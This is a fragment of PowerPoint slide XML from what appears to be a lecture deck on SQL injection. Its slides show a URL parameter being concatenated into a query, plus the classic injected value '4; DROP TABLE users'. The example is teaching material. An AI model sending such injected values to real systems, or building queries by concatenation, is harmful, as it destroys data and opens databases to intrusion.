        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332408300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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317459164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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="3059376"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7074B64-8AEF-A749-93EB-7CC37FE30E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19109236">
            <a:off x="8349108" y="2358545"/>
            <a:ext cx="446314" cy="793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14464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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19109236">
            <a:off x="8349108" y="2358545"/>
            <a:ext cx="446314" cy="793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1CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="3059376"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816268" y="3418294"/>
            <a:ext cx="6080328"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id=4;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068728442"/>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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19109236">
            <a:off x="8349108" y="2358545"/>
            <a:ext cx="446314" cy="793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1CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="3059376"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816268" y="3418294"/>
            <a:ext cx="6080328"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id=4;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="4020977"/>
            <a:ext cx="6798790" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4; DROP TABLE users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305408572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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19109236">
            <a:off x="8349108" y="2358545"/>
            <a:ext cx="446314" cy="793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1CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="3059376"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816268" y="3418294"/>
            <a:ext cx="6080328"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id=4;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="4020977"/>
            <a:ext cx="6798790" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4; DROP TABLE users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40999803-52FE-F74F-89FE-53548837A52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816267" y="4824133"/>
            <a:ext cx="6080328"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id=”+id+”;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Down Arrow 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A25A58-FC60-BE41-8C32-D41F85AC4E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="517940">
            <a:off x="8779213" y="4359477"/>
            <a:ext cx="446314" cy="509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00881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F8401C5-AA07-D943-8C2A-102391D93D13}"/>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descr="Needle">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>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816270" y="959547"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730670" y="1268078"/>
            <a:ext cx="2408032" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="2144486"/>
            <a:ext cx="3968502" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Down Arrow 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19109236">
            <a:off x="8349108" y="2358545"/>
            <a:ext cx="446314" cy="793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1CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
